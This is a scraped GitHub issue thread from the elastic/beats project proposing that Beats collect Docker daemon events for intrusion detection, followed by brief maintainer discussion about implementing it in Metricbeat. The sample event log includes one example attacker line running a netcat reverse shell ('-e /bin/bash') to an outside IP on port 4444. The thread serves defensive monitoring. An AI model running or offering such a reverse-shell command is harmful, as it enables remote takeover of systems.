Beats: [Auditbeat] Add support for reporting Docker events

Created on 8 Apr 2018  路  4Comments  路  Source: elastic/beats

The docker events utility can report the various Docker events that are happening.

In CLI terminal 1,

$ sudo docker exec -it kibana-container bash

$ sudo docker exec -it elasticsearch-container bash

$ sudo docker top kibana-container

<Attacker exploiting another application,  and able to talk to a Docker daemon>

In CLI terminal 2,

# docker events
2018-04-07T21:13:06.015608218+05:30 container exec_create: bash  6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:06.022901891+05:30 container exec_start: bash  6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:34.756051931+05:30 container exec_create: bash  04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:13:34.763466352+05:30 container exec_start: bash  04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:20:11.095365653+05:30 container top 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)

2018-04-07T21:34:00.265485765+05:30 container exec_start: netcat 218.107.131.65 4444 -e /bin/bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)

Reporting such Docker events to Elasticsearch via Auditbeat should help in detecting attacks (powered by CSRF, SSRF security flaws) and other intrusions against the Docker daemon (socket).

I learnt about this idea from @jeredding.

Metricbeat Integrations containers discuss
Source
picture kholia

Most helpful comment

They are, we have a similar metricset in kubernetes (event), it reports all kubernetes events. It sounds to me that mimicking that one in the docker module would be a good idea.

picture exekias on 9 Apr 2018
👍2

All 4 comments

@exekias I wonder if these are the same events we read internally for the autodiscovery? If yes this might better fit into Metricbeat as the k8s we also collect there.

ruflin picture ruflin on 9 Apr 2018

They are, we have a similar metricset in kubernetes (event), it reports all kubernetes events. It sounds to me that mimicking that one in the docker module would be a good idea.

exekias picture exekias on 9 Apr 2018
👍2

@exekias should we re-title this to be metricbeat rather than auditbeat? Curious what it'd take to implement since it's come up in discussions regarding the cloud service again.

matschaffer picture matschaffer on 14 Dec 2018

I took a first stab at it and it looks trivial, will open a PR soon: https://github.com/elastic/beats/compare/master...exekias:docker-events?expand=1

exekias picture exekias on 2 Jan 2019
👍1
Was this page helpful?
0 / 5 - 0 ratings

Related issues

JalehD picture JalehD  路  3Comments
TomaszKlosinski picture TomaszKlosinski  路  3Comments
feelan03 picture feelan03  路  3Comments
jsoriano picture jsoriano  路  3Comments
exekias picture exekias  路  3Comments